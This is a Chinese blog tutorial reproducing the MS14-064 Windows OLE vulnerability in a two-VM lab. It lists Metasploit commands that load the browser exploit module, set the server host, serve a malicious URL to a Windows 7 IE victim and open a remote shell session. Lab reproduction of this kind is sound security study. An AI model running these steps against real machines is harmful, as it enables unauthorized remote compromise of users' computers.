首页 > 其他分享 >ms14_064漏洞复现

ms14_064漏洞复现

时间:2023-04-21 15:03:01浏览次数:56  
标签:064 命令 kali 虚拟机 漏洞 复现 ms14 输入

一、环境准备

   win7虚拟机x1

  kali Linux虚拟机x1

二、实验步骤

1.打开kali虚拟机终端命令行输入以下命令启动metasploit

msfconsole

2.输入以下命令搜索ms14漏洞,并在其中找到metasploit的漏洞利用模块exploit/windows/browser/ms14_064_ole_code_execution

search ms14

3.输入以下命令加载漏洞利用模块

use exploit/windows/browser/ms14_064_ole_code_execution

   这里可以看到我们的漏洞利用模块已经被启动。

4.输入以下命令查看相关设置

show options

  需要我们注意的是这里的AllowPowershellP默认为false,SRCVHOST默认为0.0.0.0,需要我们手动更改。

5.分别输入以下两个命令更改设置,注意这里我的kali虚拟机IP地址为192.168.15.138,可以在终端输入ifconfig查看自己的IP地址。

set AllowPowershellP true    #设置AllowPowershellP为true
set SRVHOST 192.168.15.138    #设置SRVHOST为192.168.15.138(需要更改为自己的kali虚拟机IP)

   设置更改完成后在终端输入exploit/rexploit执行可以得到一串URL地址。

6.轮到我们的受害者登场,开启win7虚拟机,使用IE浏览器访问刚才得到的地址。

  这时只要点击允许,这台win7虚拟机就被我们拿下啦!

7.回到kali虚拟机终端可以看到我们的受害者win7(IP地址为192.168.15.140)已经被拿下

  输入以下命令查看

sessions -i

 8.输入以下命令进入shell

sessions -i 1

  接下来就可以利用windows命令进行下一步的行动啦!

  后渗透阶段可以参考https://www.cnblogs.com/hkgan/p/17339860.html#h_393931448232551682048192605

标签:064,命令,kali,虚拟机,漏洞,复现,ms14,输入
From: https://www.cnblogs.com/hkgan/p/17340352.html

相关文章

  • Variational Quantum Linear Solver 的MindQuantum复现
    本教程复现论文VariationalQuantumLinearSolver中的图四。图四使用了文中提出的VQLS算法求解文中II.B.1中给出的问题Ising-inspiredQLSP,给出了参数\(\kappa\)与线路运行次数的关系。VQLS算法用于求解线性方程的解,即对方程\(Ax=b\),已知\(A\)和\(b\),得出方程的解\(x\)。如上图......
  • 【CVE-2020-1938】Ghostcat 漏洞复现
    0x00漏洞概述Java是目前Web开发中主流的编程语言,而Tomcat是当前流行的Java中间件服务器之一,从初版发布到现在已经有二十多年历史,在世界范围内广泛使用。Ghostcat是由长亭发现的存在于Tomcat中的漏洞,由于TomcatAJP协议设计上存在缺陷,攻击者通过TomcatAJPConnect......
  • 储存数据至mysql数据库时出现 (1064, "You have an error in your SQL syntax; check
      在msyql数据库中存储数据时,程序出现了如下报错:  打印存储的数据类型发现数据类型有错误,将数据转为str类型就可以了。。。解决思路:  在初入数据库学习时,出现这个报错还是有些懵的,于是改了捕获异常,发现存储数据函数有问题。从报错中可以看出是有跟'自营店'类似的数据有......
  • 【CVE-2017-12615】Tomcat 远程代码执行漏洞复现
    0x00环境搭建用vulhub的环境查看配置文件conf/web.xml中readonly的设置0x01漏洞复现访问主页,抓包后修改数据包可通过PUT方式创建一个JSP文件。虽然Tomcat对文件后缀有一定检测(不能直接写jsp),但我们使用一些文件系统的特性(如Linux下可用/)来绕过了限制。改完包的时候......
  • 电网经济和频率控制的多层,多时间尺度模型方法 Julia源代码,代码按照高水平文章复现
    电网经济和频率控制的多层,多时间尺度模型方法Julia源代码,代码按照高水平文章复现,保证正确,可先发您文章看是否满足您的要求由于分散的可再生能源和存储的不断增加,电力系统受到根本性变化的影响。系统中新参与者的去中心化本质要求构建电网的新概念,并实现从几秒到几天的广泛控制......
  • 深度神经网络的电力系统实时状态估计与预测源代码代码按照高水平文章复现
    深度神经网络的电力系统实时状态估计与预测源代码代码按照高水平文章复现,保证正确利用深度神经网络(DNNs)进行电力系统实时监测。在IEEE118系统的实际负载数据实验中,新的基于dnn的PSSE方案的性能几乎优于竞争对手的数量级,包括广泛采用的Gauss-NewtonPSSE求解器。基于数据驱动......
  • CVE-2018-2894漏洞复现
    docker-composelogs|greppassword用户名weblogic,口令hRJt5Yis使用前面找到的账号口令登录找到“启用web服务测试页”并勾选访问:http://***:7001/ws_utc/config.do,将WorkHomeDir:修改为:/u01/oracle/user_projects/domains/base_domain/servers/AdminServer/tmp/_WL......
  • dnstracer CVE-2017-9430 复现
    author:cxingdate:2023-4-7introduction:DNSTracer是一个用来跟踪DNS解析过程的应用程序。DNSTracer1.9及之前的版本中存在栈缓冲区溢出漏洞。攻击者可借助带有较长参数的命令行利用该漏洞造成拒绝服务(应用程序崩溃)、甚至RCE。环境搭建本人Linux虚拟机信息如下:OS64位......
  • matlab复现,考虑综合需求响应和阶梯型碳交易机制的综合能源系统优化调度策略
    matlab复现,考虑综合需求响应和阶梯型碳交易机制的综合能源系统优化调度策略。关键词,综合能源系统,碳交易机制,综合需求响应。matlab复现,考虑综合需求响应和阶梯型碳交易机制的综合能源系统优化调度策略。关键词,综合能源系统,碳交易机制,综合需求响应。YID:4280669326294816......
  • NKCTF MISC赛后复现
    一、hard-misc1.base32在线解码,得到公众号回复指定内容,得到flag二、blue1.使用DiskGenius挂载虚拟磁盘2.在文件夹中找一找,在主分区的目录下找到含有flag的txt三、三体1.观察图片颜色,猜测通道中有数据,使用zsteg分析一下bmp文件zsteg-a1.bmp2.发现b8,b,lsb,xy这一通......